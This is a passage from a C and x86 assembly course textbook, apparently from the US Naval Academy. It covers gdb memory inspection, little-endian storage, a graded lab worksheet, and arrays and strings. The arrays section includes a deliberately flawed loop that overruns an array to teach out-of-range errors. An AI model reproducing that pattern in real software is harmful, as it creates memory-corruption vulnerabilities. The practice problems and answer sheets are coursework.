address 08048354. We looked earlier at this section of main memory, exploring the results as machine language and assembly
language:
Memory address
Value stored at this address
70
So, the assembly language instruction at address 08048354 is
mov
DWORD PTR [ebp-4],0x7.
This assembly language instruction is stored in memory locations 08048354 through 0804835a inclusive.
Here is the key point:
The assembly language instruction
mov
DWORD PTR [ebp-4],0x7
is actually equivalent to the machine language
00 00 00 07 fc 45 c7
The question faced by the designers of the x86 was: In what order should we store 00 00 00 07 fc 45 c7 in memory?
The answer for the x86 processor is to store the least significant byte in memory first, and then continue downward. So, the
least significant byte (c7) goes into memory first (at address 08048354) then the next-least-significant byte (45) goes into
the next address (08048355), and so forth.
The debugger automatically reverses the little-Endian notation for us, restoring the proper order.
Practice Problem 3.9
What do you think will be displayed by the command: x/xw 0x08048354 ? Confirm your result.
Solution:
Step 5. Using the examine command with registers. If we instead want to see the contents of a memory location whose
address is in a register, we supply the register name preceded by a dollar sign. So, the command
x/xb $eip
means the following: "The instruction pointer holds an address (specifically, the address of the next instruction to be executed).
Go to that address. Then tell me what is stored at that address, but only proceed one byte into memory please."
71
Practice Problem 3.10
What do you think will be displayed by the command: x/xb $eip . Confirm your result.
Solution:
The preceding example is explained by the picture below. The command x/xb $eip means that we should proceed to the
memory location that is contained in the instruction pointer, and read off one byte.
Practice Problem 3.11
What do you think will be displayed by the command: x/xh $eip . Confirm your result.
Solution:
Practice Problem 3.12
What do you think will be displayed by the command: x/xw $eip . Confirm your result.
Solution:
Practice Problem 3.13
What do you think will be displayed by the command:
x/i $eip . Confirm your result.
Solution:
Step 6. Wonderful… so what does the program actually do? We mentioned that our program has two lines of code we
care about:
0x08048354 <main+16>:
0x0804835b <main+23>:
mov
mov
DWORD PTR [ebp-4],0x7
DWORD PTR [ebp-4],0x7d1
We know that the eip contains the first instruction's address: 0x8048354. If we were to execute one instruction and then
freeze again, the instruction executed would be
mov
DWORD PTR [ebp-4],0x7
What does this cryptic instruction do?
For starters, the register ebp is the base pointer (which, you may recall from earlier in this chapter, points to the memory
address immediately below the bottom of the stack). The stack is a section of memory that our program has available to store
any values it needs. The esp register contains the address of the "top" of the stack, and the ebp contains the address below
the bottom.
This assembly language instruction means (in plain English):
Move the value 0x7 into the address pointed to by ebp-4 (the base pointer, minus 4).
72
The base pointer contains an address; this instruction will write the value 0x00000007 into the address 4 above the address
contained in the base pointer.
Let's look at a picture of the bottom of the stack. Suppose the base pointer contained the address 0xbffff818. Then that
would mean that my program is storing all the information it needs (for example, variables) just above address 0xbffff818.
See the picture below:
So… If I know the value 0x00000007 is going to be placed in the address 4 above the ebp in memory, how does that change
the image above?
First, let’s figure out the address where the 7 is placed (ebp-4):
-
0xbffff818
4
0xbffff814
That’s not so bad. So the 4-byte value 0x00000007 is going to begin at address 0xbffff814.
Next, we have to remember the order in which those bytes are stored. (If you’re thinking, Little Endian – GREAT!)
Remember, little endian order means that the least significant byte goes in the first address, the second-leastsignificant byte goes in the next address, and so on, so let’s take a look at how that applies to a 4-byte integer.
The integer “7” is represented by the following 4 bytes:
0x 00 00 00 07
MSB
(Most significant
Byte)
In memory, the least significant byte goes in the first address, like this:
LSB
MSB
73
LSB
(Least significant
Byte)
To tie it all together - the “big picture,” if you will – the 4 bytes are placed in memory, with the least significant byte
beginning at address 0xbffff814, like this:
That’s probably enough pontificating about what will happen when the next instruction is executed... Let’s actually execute a
single instruction, and then freeze again! Enter the command:
nexti
After you enter this command, you should see:
0x0804835b
5
x = 2001;
Practice Problem 3.14
When you execute a command (as you just did when you typed nexti), what happens to the instruction pointer (eip)?
Solution:
Practice Problem 3.15
What is the value stored in the eip register? Does this answer make sense?
Solution:
We have advanced to the next instruction. The instruction at address 0x0804835b will be the next instruction to execute, as
shown on the next page.
Practice Problem 3.16
What should I type to examine memory to see the integer 7 that has just been placed on the stack? (Confirm your result!)
Solution:
Practice Problem 3.17
What assembly language instruction is located at 0x0804835b?
Solution:
74
Memory address
Value stored at this address
Practice Problem 3.18
Sketch what you expect the stack to look like after the instruction at address 0x0804835b is executed.
Solution:
75
Let’s execute a single instruction, and then freeze again! Enter the command:
nexti
Practice Problem 3.19
What two things happen when nexti is entered?
Solution: 1.
2.
Practice Problem 3.20
What should you type to examine memory for the hex values you sketched in Practice Problem 3.18? (Confirm your result!)
Solution:
Practice Problem 3.21
What should you type to examine memory for the integer 2001? (Confirm your result!)
Solution:
Congratulations! You've completed your first program autopsy!
76
Appendix: Memory Storage Example
This material (Chapter 3) is the toughest chapter in EC310. Midshipmen in the past have struggled with the Chapter 3 material
because it introduces a slew of new concepts (the debugger with its many cryptic new commands, assembly code, a first look
at registers and memory organization, etc.), all of which are alien to anything you have seen before in any other USNA class.
You should rest assured that with some effort the concepts will solidify. The remainder of this chapter contains an extended
memory storage example. While this example will not be covered in class, it is recommended that you take time to work
through it. Note that in each case that a question is asked, the correct answer follows.
Suppose I have the following variable declarations in a C program:
int
char
char
int
zz = 206578;
letter1 = ‘v’;
letter 2 = ‘N’;
y = 154;
Note:
decimal 20657810 is 0x326F2 in hexadecimal
character ‘v’ is 0x76 in hexadecimal (from ASCII table)
character ‘N’ is 0x4E in hexadecimal (from ASCII table)
decimal 15410 is 0x9A in hexadecimal
Suppose when the program gets compiled with gcc, the compiler sets aside storage space in the main memory (RAM) for the
program and its variables, and variable zz gets stored at the first memory address below, then letter1, then letter2, then
y.
Memory Address
0x08048374
0x08048375
0x08048376
0x08048377
0x08048378
0x08048379
0x0804837A
0x0804837B
0x0804837C
0x0804837D
0x0804837E
0x0804837F
0x08048380
0x08048381
Data at that Memory Address (Hex)
1. How many total bytes are used to store these variables in memory?
Answer:
4 bytes for zz, 1 byte for letter1, 1 byte for letter2, 4 bytes for y: 10 bytes total
2. What are the actual bit values that will be stored in the memory? Give your answer as hexadecimal values.
Answer:
Variable zz is an integer, so is stored in 4 bytes (which is 8 hexadecimal digits). In memory, its value looks like:
0x000326F2
Variable letter1 is stored in one byte (which is 2 hexadecimal digits). In memory, its value looks like: 0x76
Variable letter2 is also stored in one byte, and in memory its value looks like: 0x4E
Variable y is an integer, so it is stored in 4 bytes (8 hexadecimal digits), and in memory its value looks like:
0x0000009A
3. How will the values be stored in the memory?
Answer:
char values are stored in one byte, so they look as is.
int values are stored in “little endian” format, so the least significant byte is stored FIRST in the memory location,
and the most significant byte is stored LAST (this is the reverse order of what you’d think it should be).
77
The memory values will look as follows:
Variable
y
Letter2
Letter1
zz
Garbage
bits
Memory Address
0x08048374
0x08048375
0x08048376
0x08048377
0x08048378
0x08048379
0x0804837A
0x0804837B
0x0804837C
0x0804837D
0x0804837E
0x0804837F
0x08048380
0x08048381
Data at that Memory Address (Hex)
9A
00
00
00
4E
76
F2
26
03
00
10
00
00
A3
4. What are the values and addresses of the variables?
Answer:
y = 154 (which is 0x0000009A in hex), and the addresss of y is 0x08048374
letter2 = ‘N’ (which is 4E in hex), and the address of letter2 = 0x08048378
letter1 = ‘v’ (which is 76 in hex), and the address of letter1 is 0x08048379
zz = 206578 (which is 0x000326F2 in hex), and the address of zz is 0x0804837A
78
Problems
1.
Examine the following C program and describe the expected output. (Note: The output for count%2 is the remainder
of count divided by 2; i.e. 4%2 is 0, while 4%3 is 1.)
#include<stdio.h>
int main()
{
int count;
for( count = 1; count <= 4 ; count = count + 1 )
{
if( count %2 == 0)
printf("Echo\n") ;
else
printf("Oscar\n") ;
}
}
2.
What exactly will the following C program do after it is compiled and executed?
3.
#include<stdio.h>
int main()
{
int j;
for(j = 10; j > 2; j = j - 2)
{
printf("Go Navy!\n");
}
}
What is the exact output of the program below if the user enters 5 when prompted?
#include<stdio.h>
int main( )
{
int number , counter ;
printf( "Enter a number: " ) ;
scanf( "%d" , &number );
if( number != 5 )
printf( "I love EC310!\n" );
else
printf( "What's for lunch?\n" );
for(counter = number ; counter < 10 ; counter = counter + 3)
printf( "Navy\n" );
4.
}
Consider this screenshot:
(a)
(b)
What type of language is depicted in the screenshot below?
Describe what this line of code accomplishes.
79
5.
Consider the picture below:
Memory address
(a)
(b)
(c)
6.
Value stored at this address
In words: what is held in the eip register, i.e., what is the purpose of this register? (Your answer should not
be: "804838d".)
What would be displayed on the monitor by the command: x/xb $eip ?
What would be displayed on the monitor by the command: x/s
0x08048475 ? (Hint: the string
stops at the first byte that reads 0000 0000.)
What is the exact output of the following C program if the user enters 4 when prompted to enter a start value?
#include<stdio.h>
int main ()
{
int start_value , number;
printf( "Enter a start value: ");
scanf("%d" , &start_value );
for( number = start_value ; number != 12 ; number = number + 2 )
{
printf("I love cyber!\n");
}
}
7.
Consider again the program shown in Question 6 above. What happens if the user enters 7 when prompted to enter a
start value?
80
8.
We would like to write a complete C program that prompts the user to enter an integer. The program should then
provide the absolute value of the integer. See the screen capture below.
Fill in the missing code in the two red boxes shown below so that the program executes successfully. Each red box is
missing only one line of code!
#include<stdio.h>
int main ()
{
int value;
printf( "Enter an integer: ");
scanf("%d" , &value );
if(
{
)
}
printf("The absolute value of the number is: %d\n" , value );
}
9.
In this problem we are going to use the program named firstprog.c which is located in the booksrc directory.
We need to copy this file to the work directory. To copy the file named firstprog.c from the booksrc
directory to the work directory, first ensure you are in your home directory be entering
cd
and then carefully enter the following at the home directory prompt:
midshipman@EC310:~ $
cp
booksrc/firstprog.c
Make sure you are at your home directory!
Verify that you have firstprog.c
work
Enter this!
in your work directory by changing to the work directory:
cd work
and then listing the files in the work directory:
ls
You should see the firstprog.c file (along with perhaps some additional files from recent labs).
The program firstprog.c is shown below
#include <stdio.h>
int main()
{
int i;
for( i = 0; i < 10; i++ )
{
printf("Hello World!\n");
}
}
81
Note: i++ means exactly the
same thing as i = i + 1
Compile your program using gcc:
gcc –g firstprog.c
and then run your program
./a.out
to confirm it executes as expected.
Then start the debugger by entering the following commands (hitting ENTER after each command)
gdb –q
./a.out
set dis intel
list
disassemble main
break main
run
(a)
The program has now stopped at the first line of code after the line int main( ). Recall that the eip
register holds the address of the next instruction that will be executed. What is the address stored in the eip
register?
(b)
What is the next assembly language instruction that will be executed?
(c)
Consider the assembly language instruction
mov
DWORD PTR [ebp-4],0x0
This instruction places the value 0 into the memory location whose address is stored at ebp-4.
Enter nexti to execute this instruction
What is the value of ebp?
(d)
What is the value of ebp–4?
(e)
What is stored in the address specified by the value ebp–4? Hint: Use the x/xw with your answer to
question (d).
(f)
Look at the value of the instruction pointer (eip). Has it changed from your answer to part (a)? Why?/Why
not?
(g)
The next assembly language instruction that will be executed is:
cmp
DWORD PTR [ebp-4],0x9
This instruction will compare the value of 9 to the value you examined in question (e). Referring back to the
C source code, what do you think this assembly language instruction is doing?
Enter nexti to execute this instruction
(h)
The assembly language instruction that will be executed next is
jle
0x8048393 <main+31>
82
This instruction means:
If the results of the preceding comparison showed that the value stored at the memory location
whose address is stored at ebp-4 were less than or equal to 9, jump to address 0x8048393.
Enter nexti once. What is the value of the eip register?
If you answer to (h) is not 0x8048393 then you have gone off the rails! STOP! See your instructor (or MGSP).
(i)
Explain, in words, why the instruction pointer has the value that it has.
(j)
The assembly language instructions
mov
DWORD PTR [esp],0x8048484
moves the value 8048484 into the location pointed to by the stack pointer.
Enter nexti once.
What is the value of the address stored in the stack pointer (esp)?
10.
(k)
What is stored at the memory location whose address is in the stack pointer? (Hint: use x/xw to examine
the value stored at the address specified by the stack pointer.
(l)
We would like to know the significance of the address 0x8048484 . What is stored at this location?
(Hint: Examine the first four bytes stored starting at this memory location…think ASCII… could this be a
string?)
Consider the following C program.
#include<stdio.h>
int main()
{
int i;
for( i=0; i < 4; i=i+2 )
{
if( i >= 2 )
{
printf(“Torpedoes\n”);
}
else
{
printf(“Howitzer\n”);
}
}
}
(a)
(b)
State how many times the loop will iterate.
What will be printed to the screen when the program is executed?
83
11.
Answer the following questions based on the below screen capture of assembly code in the debugger.
(a)
Part of the source code that generates this assembly code is the line:
int x = 5;
Which assembly language instruction corresponds to this C code?
(b)
What is the memory address (in hexadecimal) of the variable x?
(c)
What is the address of the next line of code to be executed?
84
Security Exercise 3
Part 1: Initial Set-up
Open VMware and power on the EC310 virtual machine. You should be in your home directory:
List the various files and directories using ls. You should see:
Shown pictorially, the files and directories under your home directory look like this:
Your instructors have prewritten many of the C programs you will need for EC310, and have placed them in the ec310code
directory. We have done this because we care. In fact, as you are no doubt already aware, the ECE Department is known
universally as The Caring Department.
As you progress through the course, you should ensure the programs you are working on are located in your work directory.
The program you will use today is named sx3.c and it is in the ec310code directory:
We need to copy this file to the work directory. To copy the file named sx3.c from the ec310code directory to the work
directory, carefully enter the following at the home directory prompt:
midshipman@EC310:~ $
cp
ec310code/sx3.c
Make sure you are at your home directory!
Enter this!
85
work
If all went well, you should have a copy of sx3.c in your work directory.
Verify that you have sx3.c in your work directory by changing to the work directory:
cd work
and then listing the files in the work directory:
ls
You should see the sx3.c file (along with perhaps some additional files from last lab):
If you do not have sx3.c in your work directory STOP and ask your instructor or lab tech for help. Otherwise, proceed to
Part 2.
I'm a famous USNA grad. Don't you see the
light? Who am I?
Part 2: Running the C Program
You should now be in the work directory:
Examine the program sx3.c using nano (i.e., type in: nano sx3.c ). The C program is shown below:
#include<stdio.h>
int main( )
{
int x;
x = 5;
if( x == 4)
printf( "Army\n");
else
printf("Navy\n");
86
}
Note that this is a silly program, because it is designed to always print out Navy. In other words, this program has no need for
an if-else statement. We have intentionally written the program this way to give you practice traipsing through memory.
Save the program by entering Control-o (where that is the letter o, not the number 0) saving the file under its current name,
and exit nano by entering Control-x.
Compile your program using gcc:
gcc –g sx3.c
and then run your program
./a.out
to confirm it executes as expected. If your program is not working STOP and ask your instructor or lab tech for help.
Otherwise, proceed to Part 3.
Part 3: Program Autopsy: Case 2
Set up the debugger using the code shown below:
gdb –q
./a.out
After you press enter, you should see a line of gobbledygook (Using host libthread…) and then you should see the prompt
change to (gdb) indicating that you are using the debugger. Then continue by entering the following commands (hitting
ENTER after each command).
set dis intel
list
disassemble main
break main
run
.
87
Here is a screen capture of the assembly code you should see:
Program has stopped here, at
this breakpoint.
Notice that the program has stopped at the breakpoint shown above. The line:
Breakpoint 1 at 0x8048384: file sx3.c, line 5.
means, in English: The next instruction that will be executed (but has not yet been executed) is stored in address 0x8048384.
If we look for this address in the top part of the assembly code, we quickly find it:
88
Question 1:
From the picture above, what should be the current value of the instruction pointer (i.e., what address
is stored in the instruction pointer)? Verify your answer by inspecting the value of the instruction
pointer by entering: i r eip
Question 2:
What is the next assembly language instruction that will be executed (but has not yet been executed)?
Look at the line of code:
mov
DWORD PTR [ebp-4],0x5
What is this assembly language code trying to accomplish? In English, this assembly language instruction is saying:
Place the value 5 in main memory at the location that has the address: ebp-4.
Recall that ebp is one of the CPU's registers. Specifically, ebp points to one end of the region in main memory that the
program has available to store the variables and values that it needs. Again: ebp holds an address.
Whatever value is in ebp, the value of "ebp-4" will be the address four bytes earlier than ebp:
So, the instruction
ebp – 4:
Question 3:
mov
DWORD PTR [ebp-4],0x5
would place the value 5 in the memory location specified by
In my illustrative example above, where I entered the value 5 into address baaaa810, why did I
block out (in blue) four bytes of memory?
Recall that our C program is:
89
#include<stdio.h>
int main( )
{
int x;
x = 5;
if( x == 4)
printf( "Army\n");
else
printf("Navy\n");
}
And the next assembly language instruction that will be executed (but has not yet been executed) is:
mov
DWORD PTR [ebp-4],0x5
Question 4:
What line(s) of C code does this assembly language correspond to?
Now, execute one line of machine code—the line above—by entering
So… you have just executed the instruction
Question 5:
mov
nexti
DWORD PTR [ebp-4],0x5.
Examine the assembly language code shown two pages back. What values do you expect to be
stored in the instruction pointer? Verify your answer by examining the value of eip. (You know
how to do this! i r eip .)
If your answer to Question 5 did not end in the hexadecimal number b then STOP and ask your instructor or lab tech for help.
Otherwise, proceed to Part 4.
Part 4: Program Autopsy Continued
Recall that the assembly language instruction you recently executed – mov DWORD PTR [ebp-4],0x5 – places the value
5 in the memory location specified by ebp–4 . Let's see if this is accurate!
Question 6:
What is the value stored in ebp?
Question 7:
What is the value of ebp-4?
Question 8:
Examine memory to determine what is stored in the address specified by ebp-4 . Use the examine
command: x/x followed by the address you want to examine. For example, if you want to look at
the contents of memory location 0xbffff800 you would enter x/x 0xbffff800.
Question 9:
In the picture below, which shows a section of the stack, fill in the value of ebp, write the addresses
next to all memory locations, and fill in the values stored in locations. Specifically, fill in the hex
value corresponding to the byte stored at each memory location shown in the diagram. (This picture
is also replicated on your answer sheet.)
Now look at the next line of code that will be (but has not yet been) executed:
cmp
DWORD PTR [ebp-4],0x4
90
In x86 assembly language, cmp means compare. Specifically, this line of code is comparing the value stored at the address
ebp-4 to the value 4.
Question 10:
Are the two values — the value stored at location ebp – 4 and the integer 4 – equal to each other
or not equal to each other?
Question 11
Look again at your C program. What portion of C code do you think the assembly language
instruction
cmp
DWORD PTR [ebp-4],0x4
corresponds to?
Now, execute one line of code by entering nexti .
You have just executed the instruction: cmp DWORD PTR [ebp-4],0x4 ).
Question 12:
By looking at the value stored in the instruction pointer, and by looking at the assembly language
code shown a few pages back, what is the next line of assembly code that will be executed (but has
not yet been executed)?
If your answer to Question 12 did not end in the hexadecimal number f then STOP and ask your instructor or lab tech for
help. Otherwise, proceed to Part 5.
Part 5: Program Autopsy Continued Continued
Look at the instruction:
jne
0x804839f
In x86, jne stands for jump if not equal. Recall that the preceding instruction did a comparison, and, based on the results of
the comparison, we will have the answer:
Yes, the two items that were compared are equal
So the line of code
jne 0x804839f
or
No, the two items that were compared are not equal.
means, in English:
If the two items we just compared are not equal, jump to instruction at address 0x804839f. Otherwise (if the items
were equal), just continue with the next instruction in sequence.
Question 13:
Do you expect that after we execute the assembly language instruction
jne
0x804839f
the CPU will jump to 0x804839f as the next instruction? Explain.
Now, execute one line of code by entering nexti . This will execute the line:
jne
Question 14:
0x804839f
.
What is the new value of the instruction pointer? Explain.
Question 15:
What is the next line of assembly language code that will be executed? (Look at the address in the
eip register and find the corresponding assembly language instruction.)
Let’s examine the assembly language instruction:
mov
DWORD PTR [esp],0x804848a
This essentially says: The variable esp holds an address. Place the value 0x804848a in the location specified by this
address. So, for example, if esp holds the address 56, then this will place the value 0x804848a in memory location 56.
Execute this instruction by entering nexti.
Question 16.
The picture below shows a portion of the program's stack in main memory. Notice that the value 5
is stored at addresses bffff814 – bffff817. Complete the picture by filling in the value of
the stack pointer (esp) as well as the contents of memory locations bffff810 – bffff813.
Note that this figure is replicated on your answer sheet.
91
STOP . Show your instructor or lab tech your answer to Question 16. Then proceed to Part 6.
Part 6: Be a Hacker!
Our program is very interested in the address 0x804848a. It took the time to store this value on the stack, and the stack is
used to store information the program needs to successfully execute.
Question 17:
Investigate what is so special about address 0x804848a . Look inside this address using the x/x
command. Be a sleuth! Why does this address matter? (Hint: there are characters stored there!)
The remaining part of the program simply prints the string of characters at address 0x804848a to the monitor.
To exit out of the debugger, enter: quit . When you are asked:
The program is running.
Exit anyway? (y or n)
select y.
Part 7: EXTRA CREDIT Program Autopsy: Case 3
Using nano, change your C program by replacing the line
x = 5;
with the line
x = 4;
Then run the program line-by-line in the debugger (gdb) as before.
Question 18:
Your first breakpoint was at main. As you execute the program by repeatedly entering nexti,
what is the first line of assembly language that is executed in this program that was not executed in
the prior program?
Question 19:
What is the significance of the number 0x8048484 which appears in the assembly code?
92
Security Exercise 3 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6:
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
93
Question 14:
Question 15:
Question 16:
Question 17:
EXTRA CREDIT
Question 18:
Question 19:
94
Chapter 4: Arrays and Strings
Objectives:
(a) Describe how an array is stored in memory.
(b) Define a string, and describe how strings are stored.
(c) Describe the implications of reading or writing beyond the boundary of an array.
(d) Describe how to change the values of individual array elements.
1. Arrays
1.1. Why Use Arrays? Consider the following problem: Suppose an instructor has just finished grading the six-week exams
for the twenty midshipmen in her section of EC310. Write a C program that will compute the average and also determine how
far each student’s individual grade is from the average.
One way to start this program would be to declare twenty variables to hold the twenty grades:
float student1_grade, student2_grade, student3_grade … etc., etc.
This is cumbersome. All these variables! Ugh. Suppose there were 100 students in the section. We would need 100 variables
to hold the 100 grades.
Suppose we consider a different (better!) approach. Instead of having 20 separate variables to hold our 20 six-week exam
scores, we will use a "large box with multiple slots." We might name the entire large box six_week_grade. The top slot
will hold the first student’s six-week exam grade, the second slot will hold the second student’s six-week exam grade, and so
forth. Instead of using the term "large box with multiple slots", let’s call this an array. In C, an array is frequently also termed
a buffer.
First student's grade goes here
Second student's grade goes here
Third student's grade goes here
So that we can more easily draw our arrays, we will imagine that our section has five students. The concepts will, of course,
apply to arrays of any size. Let's say, for the purposes of this discussion, that our five students: Mid 1, Mid 2, Mid 3, Mid 4
and Mid 5, have grades of 98, 87.5, 94, 90 and 92, respectively.
1.2. Arrays An array is a collection of data, all of the same type. Recall that when we say type we are referring to int, float
or char. More precisely, an array is a consecutive group of memory locations, all with the same name, all holding the same
type of data. Our array of five student grades (all of type float) might be arranged in main memory as:
95
First student's grade goes here
Second student's grade goes here
Third student's grade goes here
Fourth student's grade goes here
Fifth student's grade goes here
Notice first that our five array elements are stored in consecutive memory locations. Second, note that the addresses are
separated by four bytes, since each value of type float is stored in four bytes. The precise location in main memory where
the array will be stored is determined by the compiler.
You might be surprised to know that the third and most important point to note in the figure above are the ellipses (i.e., the
three dots) shown at the top and bottom of the array! There are items in main memory "above" our array, and items in main
memory "below" our array.
Suppose we want to give our array the name: six_week_grade . Recalling that our array will hold five grades, each of
type float, we can declare our array as:
float six_week_grade[ 5 ] ;
More generally, the syntax for declaring an array is
type array_name [ number of items in the array ] ;
All items stored in the array
must be of the same type
Same rules as for
variable names
Also called the "size" of the array; must be an integer
or an expression that evaluates to an integer
The following would all be valid examples of array declarations:
float temperatures[31];
int calories[90];
float migraine_intensity_level[1000];
Returning to our example, when we first declare our array as
float six_week_grade[ 5 ] ;
the compiler will reserve adjacent memory for five variables of type float. The entire array will be named
six_week_grade. The picture would look like this (where the exact addresses are chosen by the compiler):
96
The values stored in these memory locations are, presently, "garbage values".
Note that when we declare an array, the size of the array can be a variable, so long as the variable has a value that is known.
The following code is perfectly fine, and would produce the same array as that shown above:
int number_in_class = 5 ;
float six_week_grade[number_in_class ] ;
This will work since by the time we reach the declaration for the array
float six_week_grade[number_in_class ] ;
the value of the size of the array (the variable named number_in_class) is already explicitly known from the a prior
declaration that has already been encountered:
int number_in_class = 5 ;
Practice Problem 4.1
Write a declaration that could be used to hold the individual letter grades for 250 midshipmen.
Solution:
Obviously, we do not want garbage values in our array. How do we get our student grades into this array?
1.3. Array Elements The individual elements in the array are variables. Each individual memory location in the array is
indexed by a position number in the array.
In our array named six_week_grade, the individual variables in the array (i.e., the variables that will hold the 5 individual
six-week scores) are indexed from 0 to 4. The index is placed in square brackets after the array name. So, the name of the first
variable in the array is six_week_grade[0], the name of the second variable in the array six_week_grade[1] ,
and so forth.
The individual array elements are variables and can be used in expressions just as you would ordinarily use any variable. So,
for example, the line of code
six_week_grade[ 2 ] = 94 ;
would change our picture to this:
97
So, the third midshipman grade, which we refer to as six_week_grade[ 2 ], is now stored in the array. (The other four
array values are still garbage values.)
Important point guaranteed to cause confusion: Note that the first variable in the array has an index of zero, not one. This is
counter-intuitive. In the above example, you would think that the first six-week exam grade should be indexed as
six_week_grade[1]since, after all, it is the first score. You would be wrong! The first score in our array of scores is
indexed as six_week_grade[0]. Most programming languages (e.g., C, C++, Java, JavaScript) start with the index at
zero just to make it easier for the CPU to index into the array.
We could fill in our array in memory by adding the lines of code:
six_week_grade[
six_week_grade[
six_week_grade[
six_week_grade[
0
1
3
4
]
]
]
]
=
=
=
=
98 ;
87.5 ;
90 ;
92 ;
after which our array is stored as shown:
It bears repeating: The individual array elements are variables and can be used in expressions just as you would ordinarily use
any variable. If we wanted to add two points to the first midshipman's grade we could use
six_week_grade[ 0 ]
= six_week_grade[ 0 ] + 2 ;
If we wanted to read the value of the third midshipman's grade in from the keyboard, we could use
scanf("%f", &six_week_grade[2] );
If we wanted to print the second midshipman grade to the monitor, we could use
printf("%f" , six_week_grade[1] );
We can use array elements in Boolean expressions, such as if ( score[3] > 90 )....
98
Note that when referring to an array element, the index does not need to be an integer constant. We can use any expression in
the brackets that evaluates to an integer. As an example, the for loop below might be used to read in from the keyboard the
grades for 5 students.
for (
{
number = 0 ; number < 5 ; number = number + 1 )
printf( "Enter score for student %d : " , number + 1 );
scanf( "%f" , &six_week_grade[ number ] );
}
Practice Problem 4.2
Suppose we have 5 students in EC310. A portion of a C program that declares an array of floats named six_week_grade
that will hold the midterm grades for the class is shown below. Your program should allow the user to enter the midterm grades
at runtime, and should then print out the midterm grades. Your program output should appear as shown below:
Fill in the one missing line of code.
#include <stdio.h>
int main()
{
float six_week_grade[5];
int number ;
for (
{
number = 0 ; number < 5 ; number = number + 1 )
printf( "Enter score for student %d : " , number + 1 );
scanf( "%f" , &six_week_grade[ number ] );
}
for ( number = 0 ; number < 5 ; number = number + 1 )
{
}
}
Practice Problem 4.3
Consider an array declared as
float pay[4];
(a) How much memory is reserved for this array?
Solution:
(b) What are the four variables that are collected into this array? Solution:
(c) What is the name of the array of four variables? Solution:
(d) The first array element is stored at address 0x0000008e, what is the address of the second element?
Solution:
99
1.4. Initialization of Arrays It is possible to initialize the values of an array in the array's declaration. To initialize arrays in
the declaration, we place the initial values in braces, and separate the values with commas. Our array of student grades could
have been initialized by the declaration:
float six_week_grade[ 5 ] = { 98 , 87.5 , 94 , 90 , 92 };
There are some caveats to this: First, if we initialize only the first part of an array, the remaining elements are initialized to
zero. For example, the declaration
float six_week_grade[ 5 ] = { 98 , 87.5
};
has the exact same effect as
float six_week_grade[ 5 ] = { 98 , 87.5 , 0 , 0 , 0 };
The second caveat: If you initialize an array when it is declared, you can omit the array size. The size will be set permanently
to be the minimum size needed to store the initialization values. So, for example, the array declaration
float six_week_grade[ 5 ] = { 98 , 87.5 , 94 , 90 , 92 };
is the same as the declaration
float six_week_grade[
] = { 98 , 87.5 , 94 , 90 , 92 };
When dealing with arrays, you must note that we use the square brackets [ and ] in two different ways:

In the array declaration, the number in the square brackets gives the size of the array (i.e., the number of items in the
array). This value must be known when the array is declared.

Anywhere outside the declaration, the number in the square brackets tells which element in the array (the specific
variable) we are referring to.
After six pages of array syntax, you might be thinking: "Wonderful, so what?" As we will see arrays have a horrendous security
vulnerability baked into them.
1.5. The Dreaded Out-of-Range Error C will not prevent you from trying to access an array element that is out of the
array's range. Stated another way, C will not prevent you from trying to read to or write to "nonexistent" array elements. What
exactly does this mean? Consider the array declaration
int salary[3];
which declares an array with three variables: salary[0], salary[1] and salary[2]. But what happens if we
have a statement such as
printf( “%d” ,
salary[3]
);
when there is no variable salary[3]? Let's see! Consider the program below.
#include <stdio.h>
int main()
{
int salary[3] = { 1000 , 1500 , 2000 };
int j;
for ( j = 0 ; j <= 3 ; j = j + 1 )
{
printf("Salary %d is %d \n" ,
}
j+1
, salary[j] );
}
The output from this program is:
No compilation error results in the program above...but do you see the potential dangers? Where does the last number come
from? The answer: It is the value that is located in memory immediately after salary[ 2 ]! This is a garbage value.
100
When we index an array variable using an index outside the range of indices specified in the array's declaration, we commit an
"out-of-range error." Again, it is critical to note that C will not prevent you from looking into memory beyond the end of
your array.
What would be the danger in the following program snippet?
float salary[3];
int j;
(other code not shown)
for ( j = 0 ; j <= 3 ; j = j + 1 )
{
printf("Enter salary %d: ", j + 1 );
scanf( "%f" , &salary[j] );
}
(more code)
The program above does not produce any compilation errors, but running this program is potentially very dangerous. Do you
see why? Notice that the for loop, in its final iteration, attempts to enter a value into a variable named salaries[3].
There is no variable named salaries[ 3 ]! The program will simply write over whatever was stored in the memory
location following salaries[ 2 ].
We now switch gears (slightly) and talk about arrays of characters—that is, arrays where each element in the array is of type
char.
2. Strings
2.1. Introduction Suppose the contents of 5 consecutive bytes in computer memory are as follows:
0100
0110
0111
0111
0000
1110
0001
0110
1001
0000
101
As ASCII characters, this is the same as:
'N'
'a'
'v'
'y'
0
Note that 0 is the NULL character. In C, a string of characters is a NULL-terminated sequence of characters.
2.2. String literals A literal is similar in notion to a constant. For example, the integer 5 is a literal. The float value 3.1416
is a literal. We can have string literals as well. A string literal is written as a list of characters enclosed within double quotes.
For example, "Navy" is a string literal.
Although the length of the string is 4 (the 4 characters 'N', 'a', 'v' and 'y'), it takes 5 bytes to store this string in memory.
This is because the NULL character has to be included for C to treat the collection of characters as a string.
2.3. String variables In C, strings—i.e., sequences of characters—are stored as arrays of characters. Here is an example of
declaring a string variable using a character array:
char school[5] = "Navy";
The array named school holds 5 characters: 'N', 'a', 'v', 'y', 0.
It is worth noting again that the length of the string "Navy" is 4, but it actually has 5 characters, since the NULL character
which appears at the end is actually part of the string. So if you want a string to hold "Navy", it must have space allotted for
at least 5 characters.
You may be wondering: Why the zero at the end of the string? What's up with that?
The zero at the end tells C when to stop accessing the array! For example, we have seen many times already that strings are
printed to the screen with the %s conversion specifier, as in:
printf( "Go %s! Beat %s!\n", school, "Army" );
How does the printf know when to stop printing out the string named school? As it turns out, printf will print out the
first element in the array named school, and then printf will continue to print out characters, one-by-one, until it reaches
the zero i.e., the NULL).
2.3. Changing the value of a string variable We can initialize a string variable when it is declared (as in char school[5]
= "Navy"; ). But, if we assign a string a value when it is declared, can we change the value later?
With other types, such as int, float and char, you were allowed to assign values to the variables in a manner like this:
int favorite_number ;
favorite_number = 7 ;
Unfortunately, assignments cannot be done like this with strings. The code below will not compile:
char school[5];
school = "Navy";
So… how can we change the value of a string? There are two ways.
102
Changing a string value character by character. We can change the value of a string by changing the values of the individual
characters. For example:
char school[5] = "Navy";
printf( "%s\n", school );
school[0] = 'U';
school[1] = 'S';
school[2] = 'N';
school[3] = 'A';
printf( "%s\n" , school );
